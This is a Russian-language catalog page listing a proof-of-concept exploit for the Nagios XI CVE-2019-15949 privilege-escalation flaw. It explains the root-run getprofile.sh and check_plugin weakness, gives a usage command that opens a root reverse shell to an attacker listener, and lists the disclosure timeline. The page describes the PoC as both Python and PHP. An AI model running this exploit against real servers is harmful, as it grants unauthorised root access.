Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/plur1bu5/nagios-cve-2019-15949-rce
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubplur1bu5/nagios-cve-2019-15949-rce

Nagios-CVE-2019-15949-RCE

PoC для RCE-уязвимости Nagios CVE-2019-15949 на Python

Репозиторий
5 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Nagios-CVE-2019-15949-RCE-Poc

PoC на Python для CVE-2019-15949

Обзор

В Nagios XI <= 5.6.5 существует уязвимость, позволяющая атакующему использовать RCE для повышения привилегий до root. Эксплойт требует доступа к серверу под пользователем 'nagios' или доступа к CCM через веб-интерфейс с правами на управление плагинами.

Детали

Скрипт getprofile.sh, вызываемый при загрузке системного профиля (profile.php?cmd=download), выполняется от имени root через запись sudo без пароля; скрипт выполняет исполняемый файл 'check_plugin', принадлежащий пользователю nagios. Пользователь, вошедший в Nagios XI с правами на изменение плагинов, или пользователь 'nagios' на сервере, может изменить исполняемый файл 'check_plugin' и вставить вредоносные команды, выполняемые от имени root.

POC

Разработан PHP-PoC, который загружает полезную нагрузку, приводящую к получению root-shell с обратным подключением. Использование:

python3 exploit.py tagetIp [ssl=false/true] username password Lhost lport

Пример:

python3 exploit.py 10.10.11.9 false nagiosadmin admin 10.10.11.14 4444

Раскрытие

Сообщено в Nagios: 29 июля 2019 г. Подтверждено Nagios: 29 июля 2019 г. Исправлено в версии: 5.6.6, 20 августа 2019 г. Назначен CVE: 6 сентября 2019 г. (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)

Скачать инструмент